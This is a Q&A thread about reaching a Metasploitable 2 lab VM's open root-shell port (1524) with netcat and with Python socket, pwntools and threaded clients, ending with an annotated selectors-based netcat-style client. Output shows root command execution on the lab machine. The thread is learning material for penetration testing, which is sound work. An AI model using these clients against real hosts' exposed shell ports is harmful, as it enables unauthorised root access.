
How can I access Metasploitable 2 VM shell with python socket through open shell port?

I'm just trying to learn penetration testing tools like nmap, netcat, etc. now, and I'm testing these tools on my Metasploitable 2 VM. When I scanned my Metasploitable machine's ports, I saw there is a Metasploitable root shell (1524) open port:

1524/tcp open shell Metasploitable root shell

When I connected to port 1524 with a simple netcat TCP connection, I accessed my Metasploitable 2 VM's shell immediately:

root@kali:~# netcat 10.0.2.4 1524
root@metasploitable:/#

It was very easy even for me, and I thought I could connect to my Metasploitable 2 VM via a python socket too, but it was not as easy as I thought.

import sys
import socket
import subprocess

host = '10.0.2.4' # Metasploitable 2 VM's IP
port = 1524 # Metasploitable root shell
sock = socket.socket()
try:
    sock.connect((host, port))
except Exception as err:
    print(err)

while True:
    data = sock.recv(1024)          # blocks until the remote side sends something
    cmd = input('root@nonkali:#> ')
    if cmd == 'quit':
        sock.close()
        sys.exit()
    if cmd:
        # As posted: the bytes received from the remote (its prompt) are run as a
        # local command, while the typed command is sent to the remote without a newline
        command = subprocess.Popen(data.decode('utf-8'), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
        outs = command.stdout.read() + command.stderr.read()
        str_outs = str(outs, 'utf-8')
        sock.send(cmd.encode())
        print(str_outs)

sock.close()

Output:

root@nonkali:#> ls
/bin/sh: 1: root@metasploitable:/#: not found

ls

ls
^CTraceback (most recent call last):
  File "Python/tcp_client.py", line 15, in <module>
    data = sock.recv(4096)
KeyboardInterrupt

I tried a bunch of codes like this, but I never accessed my VM's shell. I still don't know what I am doing wrong. I need a bit of help. Actually, I want to understand the difference between netcat 10.0.2.4 1524 and a python socket connection.

I'll provide two ways of doing it, that both worked for me. I tried the following on ubuntu 17.10 (with python 2.7.14). The first one is using sockets and establishing a TCP connection. The code snippet is the following:

#!/usr/bin/env python
# Python 2 (tested with 2.7.14): raw_input and the print statement

import sys
from socket import *

def nc(host, port):
    s = socket(AF_INET, SOCK_STREAM) # TCP client
    s.connect((host, port))
    try:
        while 1:
            mydata = raw_input("root@root:#> ")
            if mydata.strip()!='':
                s.sendall(str(mydata))   # send the typed line
                data = s.recv(1024)      # read one chunk of the reply (a long reply may need further recv calls)
                print data
    except KeyboardInterrupt:
        s.close()
        sys.exit(0)

if __name__ == '__main__':
    host = '...'   # target host, left unspecified in the answer
    port = 11111
    nc(host, port)

This gave me the following output:

$ ./test.py
root@root:#> ls
file1
testfile.zip
testfile3

root@root:#> whoami
testuser

root@root:#> 

The other way, as I said in the comments, is by using pwntools. The script is the following:

from pwn import *

p = remote(host, port)   # host/port: the same target as in the socket script above
p.interactive()          # hand the connection over to the terminal, netcat-style

This will work also. The main difference between the two scripts is that the first script is a native python socket-based implementation (using standard libraries only), while the other way, even if it's easier, depends on the pwntools framework and doesn't mess with low-level socket programming. Actually, both scripts are nothing more than just a simple TCP-client implementation.

I guess I found my problem: Threading! I don't know exactly how threading works, but I implemented the threading module in my code and it works well now.

#!/usr/bin/python3.6

import sys
import socket
import threading

def tcp_connect(host, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
    except Exception as err:
        print(err)
        sys.exit()
    interact(sock)

def recv(sock):
    # Reader thread: print whatever the remote sends, as soon as it arrives
    while True:
        try:
            data = sock.recv(1024)
        except OSError:
            return            # socket was closed by the writer side
        if not data:          # remote closed the connection
            print('Connection closed by remote.')
            return
        sys.stdout.write(data.decode('utf-8', errors='replace'))
        sys.stdout.flush()

def interact(sock):
    # Reading and writing run concurrently, so waiting for the prompt never blocks
    # the keyboard and vice versa; the daemon flag lets the process exit with the main thread
    th = threading.Thread(target=recv, args=(sock,), daemon=True)
    th.start()
    try:
        while True:
            cmd = sys.stdin.read(1)   # forward input byte by byte, newline included
            if not cmd:               # EOF on stdin (Ctrl-D)
                break
            sock.sendall(cmd.encode())
        print('Connection closed.')
    except KeyboardInterrupt:
        pass
    finally:
        sock.close()

if __name__ == '__main__':
    host = '10.0.2.4'
    port = 1524
    tcp_connect(host, port)

And my commands are working:

root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
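What actually separates netcat from the first script in the question, and what the threaded script above recreates, is that netcat forwards raw bytes in both directions at the same time: it never waits for the remote before reading the keyboard, and it sends the newline that ends a typed line. The following added example (mine, not code from the question, the answers, or the Metasploitable project) does the same with a single `selectors` loop instead of a reader thread, and includes a constructed loopback stand-in for a line-oriented shell service so it runs offline. The prompt, the canned replies and the names `fake_shell_server`, `relay` and `demo_session` are all assumptions of the example, and it relies on stdin being selectable (Linux or macOS).

```python
"""
Added example: a netcat-style TCP client built on selectors, plus a constructed
loopback stand-in for a line-oriented shell service so the whole thing runs offline.
"""
import io
import os
import selectors
import socket
import sys
import threading

# Constructed prompt and replies for the stand-in; a real service has its own banner.
PROMPT = b"root@fakebox:/# "
CANNED = {b"id": b"uid=0(root) gid=0(root)\n", b"ls": b"bin\netc\n"}


def fake_shell_server():
    """Start the loopback stand-in (constructed, not a real shell) and return its port.

    It sends a prompt, answers each newline-terminated line with canned output plus
    a fresh prompt, and closes the connection on 'exit' or when the client half-closes.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(PROMPT)
            buf = b""
            while True:
                chunk = conn.recv(1024)
                if not chunk:             # client shut down its write side
                    return
                buf += chunk
                while b"\n" in buf:       # only complete lines are commands
                    line, buf = buf.split(b"\n", 1)
                    cmd = line.strip()
                    if cmd == b"exit":
                        return
                    reply = CANNED.get(cmd, b"sh: " + cmd + b": not found\n")
                    conn.sendall(reply + PROMPT)

    threading.Thread(target=serve, daemon=True).start()
    return port


def relay(sock, stdin_fd, out):
    """Forward raw bytes both ways until the remote closes, like netcat.

    A naive client blocks in recv() before it has sent anything, or sends a command
    without its newline. This loop waits on *both* descriptors and forwards whatever
    is ready, so prompt, output and typed input never wait on each other. On stdin
    EOF it half-closes the socket and keeps reading until the peer closes.
    """
    sel = selectors.DefaultSelector()
    sel.register(sock, selectors.EVENT_READ, "sock")
    sel.register(stdin_fd, selectors.EVENT_READ, "stdin")
    while True:
        for key, _ in sel.select():
            if key.data == "sock":
                data = sock.recv(4096)
                if not data:
                    return "remote closed"
                out.write(data.decode("utf-8", errors="replace"))
                out.flush()
            else:
                chunk = os.read(stdin_fd, 4096)    # unbuffered: no bytes stranded in a Python buffer
                if not chunk:
                    sel.unregister(stdin_fd)
                    sock.shutdown(socket.SHUT_WR)  # tell the peer we are done sending
                else:
                    sock.sendall(chunk)            # newline included, exactly as typed


def demo_session(script):
    """Run `script` (bytes, newline-terminated lines) against the stand-in; return captured output."""
    port = fake_shell_server()
    rfd, wfd = os.pipe()
    os.write(wfd, script)
    os.close(wfd)                          # EOF on the pipe plays the role of Ctrl-D
    out = io.StringIO()
    with socket.create_connection(("127.0.0.1", port)) as sock:
        relay(sock, rfd, out)
    os.close(rfd)
    return out.getvalue()


if __name__ == "__main__":
    # Usage: python3 nc_select.py HOST PORT  (HOST/PORT: whatever service you are testing)
    with socket.create_connection((sys.argv[1], int(sys.argv[2]))) as s:
        print(relay(s, sys.stdin.fileno(), sys.stdout))
```

`demo_session()` drives the same `relay()` from a pipe, which is also why the loop reads the descriptor with `os.read` rather than through a buffered file object: a buffered `readline()` would pull several lines into Python's buffer at once, and `select` would then never report them as readable again.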
